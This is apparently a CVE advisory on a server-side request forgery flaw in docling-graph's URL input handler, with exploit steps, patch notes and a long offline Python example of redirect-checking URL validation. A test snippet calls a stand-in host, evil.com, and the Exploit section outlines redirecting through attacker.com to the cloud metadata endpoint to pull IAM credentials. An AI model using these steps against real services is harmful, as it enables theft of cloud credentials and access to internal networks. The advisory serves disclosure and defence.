docling-graph, SSRF, (CVE unknown) – critical


How the mentioned CVE works (technical details):

The vulnerability resides in the `URLInputHandler` class in docling_graph/core/input/handlers.py. This handler processes user-supplied URLs from the `--source` CLI argument or the `PipelineConfig.source` API parameter. `URLValidator` only validates the URL scheme (http/https) and checks for a non-empty `netloc`; it performs no IP address validation at all. As a result, an attacker can supply a URL that resolves to a private, loopback, or link-local address without being blocked.

Additionally, `requests.head()` is called with `allow_redirects=True`, which follows HTTP redirects automatically. An attacker can point the handler at an external URL that answers with a `301` or `302` redirect to an internal endpoint (e.g., `http://169.254.169.254/latest/meta-data/`). Because redirects are followed without re-validation, the request reaches internal services. The library then makes HTTP HEAD/GET requests to the final resolved address, enabling Server-Side Request Forgery (SSRF): cloud metadata endpoints (169.254.169.254), loopback (127.0.0.1), and private network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) are all reachable. This is especially dangerous in multi-tenant pipelines or server-side automation where untrusted users control the source URL.

dailycve form:
Platform: docling-graph
Version: <1.5.1
Vulnerability: SSRF via URL
Severity: Critical
Date: 2025-01-05
Prediction: 2025-01-10

What Undercode Say:

# Check if docling-graph is vulnerable (version <1.5.1)
pip show docling-graph | grep Version

# Simulate the vulnerable behavior (manual test; needs network access and an attacker-controlled redirector)
python3 -c "
import requests
# The vulnerable code allowed redirects to internal IPs
url = 'http://evil.com/redirect-to-metadata'
# Attacker sets up a redirect to 169.254.169.254
response = requests.head(url, allow_redirects=True)
print(response.url)  # Would show the internal endpoint
"

# Safe validation code from patch (simplified)
python3 -c "
import ipaddress, socket
def is_private(hostname):
    ip = socket.gethostbyname(hostname)
    return ipaddress.ip_address(ip).is_private
print(is_private('169.254.169.254'))  # True -> blocked
"

Exploit:
1. Attacker controls the `--source` argument: `docling-graph --source http://attacker.com/redirect`
2. Attacker hosts a server returning an HTTP 302 redirect to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
3. `requests.head(..., allow_redirects=True)` follows the redirect to the metadata endpoint.
4. The library fetches internal data and returns it to the attacker via error messages or document output.
5. Alternative: a direct URL such as `http://192.168.1.1/admin`; no validation blocks it.

Protection from this CVE:

- Immediate upgrade: `pip install --upgrade docling-graph` to 1.5.1 or higher.
- If upgrading is not possible: never pass untrusted URLs to `--source` or `PipelineConfig.source`; use only trusted internal sources.
- Patch details: the fix adds `ipaddress` and `socket.gethostbyname()` validation before any request, blocks private/loopback/link-local/reserved addresses, and sets `allow_redirects=False` with explicit validation of the `Location` header before following any redirect.
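
The redirect chain from the Exploit section and the validate-then-follow behaviour described in the patch details above can both be exercised offline. The following is an added example, not docling-graph's own code and not the 1.5.1 patch: a `validate_url` that resolves the host and rejects every non-public address, a `safe_head` that handles redirects itself and validates each `Location` before requesting it, and a `vulnerable_head` stand-in for the pre-fix behaviour. `SSRFBlocked`, `validate_url`, `safe_head`, `vulnerable_head`, `probe`, the fake DNS table (`attacker.example`, `internal.corp`, the 93.184.216.34 address) and the redirect chain are all constructed for this demo.

```python
"""Added example, not docling-graph's code: URL validation that resolves the host,
rejects non-public addresses and re-checks every redirect hop, next to a stand-in
for the pre-1.5.1 behaviour. All names, the DNS table and the redirect chain are
constructed for this demo."""
import ipaddress
import socket
from typing import Callable, Dict, Iterable, List, Tuple
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
Resolver = Callable[[str], Iterable[str]]
Fetcher = Callable[[str], Tuple[int, Dict[str, str]]]  # one request, no redirects

class SSRFBlocked(ValueError):
    """A URL, or a redirect target, points at a non-public address."""

def is_disallowed_ip(ip: str) -> bool:
    """True for anything not globally routable: loopback, link-local (169.254/16, so the
    metadata endpoint), RFC 1918, CGNAT, reserved, unspecified, multicast.
    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped so it cannot sneak past."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (not addr.is_global) or addr.is_multicast

def resolve_all(host: str) -> List[str]:
    """Every A/AAAA answer, not just the first: one private record is enough to reject."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def validate_url(url: str, resolver: Resolver = resolve_all) -> str:
    """Scheme, host and address check; returns the URL or raises SSRFBlocked."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise SSRFBlocked(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname  # strips userinfo, port and IPv6 brackets
    if not host:
        raise SSRFBlocked("empty host")
    try:
        ips = [str(ipaddress.ip_address(host))]  # literal IP, no DNS needed
    except ValueError:
        ips = list(resolver(host))
    if not ips:
        raise SSRFBlocked(f"{host!r} does not resolve")
    for ip in ips:
        if is_disallowed_ip(ip):
            raise SSRFBlocked(f"{host!r} resolves to non-public address {ip}")
    return url

def safe_head(url: str, fetch: Fetcher, resolver: Resolver = resolve_all,
              max_redirects: int = 5) -> Tuple[int, str]:
    """HEAD with redirects handled here: each Location is validated before it is
    requested. In production `fetch` wraps requests.head(u, allow_redirects=False)."""
    current = validate_url(url, resolver)
    for _ in range(max_redirects + 1):
        status, headers = fetch(current)
        if status not in REDIRECT_STATUSES:
            return status, current
        location = {k.lower(): v for k, v in headers.items()}.get("location")
        if not location:
            raise SSRFBlocked("redirect without Location header")
        current = validate_url(urljoin(current, location), resolver)
    raise SSRFBlocked("too many redirects")

# Constructed demo data (no network): the attacker's host 302s to the metadata endpoint.
FAKE_DNS = {"attacker.example": ["93.184.216.34"], "internal.corp": ["10.0.0.5"]}
FAKE_HOPS = {
    "http://attacker.example/redirect": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}),
    "http://attacker.example/doc.pdf": (200, {}),
    "http://169.254.169.254/latest/meta-data/": (200, {}),
}

def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])

def fake_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    return FAKE_HOPS.get(url, (404, {}))

def vulnerable_head(url: str, fetch: Fetcher = fake_fetch, max_redirects: int = 5) -> Tuple[int, str]:
    """Stand-in for the pre-1.5.1 path described above: scheme/netloc check only,
    then redirects followed blindly, as allow_redirects=True does."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        raise ValueError("bad URL")
    current = url
    for _ in range(max_redirects + 1):
        status, headers = fetch(current)
        if status not in REDIRECT_STATUSES:
            return status, current
        current = urljoin(current, headers.get("Location", ""))
    raise ValueError("too many redirects")

def probe(url: str) -> str:
    """Hardened path against the demo data: 'OK <status> <url>' or 'BLOCKED: <why>'."""
    try:
        status, final = safe_head(url, fake_fetch, fake_resolver)
        return f"OK {status} {final}"
    except SSRFBlocked as exc:
        return f"BLOCKED: {exc}"
```

`vulnerable_head("http://attacker.example/redirect")` ends on the metadata URL as its final hop, while `probe` of the same URL is stopped at the redirect target, as are a literal `http://192.168.1.1/admin` and a hostname that resolves to 10.0.0.5. Two caveats for anyone adapting this: `requests` resolves the hostname again when it connects, so a rebinding DNS server can answer with a public address during validation and an internal one afterwards; pin the validated IP (connect by address and set the Host header, or use an adapter that does) if that threat matters. And `requests.head()` already defaults to `allow_redirects=False`, which is what the manual hop loop above relies on.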

Impact:

  • Confidentiality: Leak of cloud IAM credentials (AWS, GCP, Azure metadata), internal service data, configuration files, and private network information.
  • Integrity: Potential modification of internal resources if vulnerable endpoints support write operations (e.g., internal APIs).
  • Availability: Could cause denial-of-service by targeting internal services or self-requests (loopback amplification).
  • Scope: All multi-tenant deployments using docling-graph to process user-supplied URLs are affected. Attackers can pivot to internal networks, bypass firewalls, and escalate privileges via stolen credentials.


Sources:

Reported By: github.com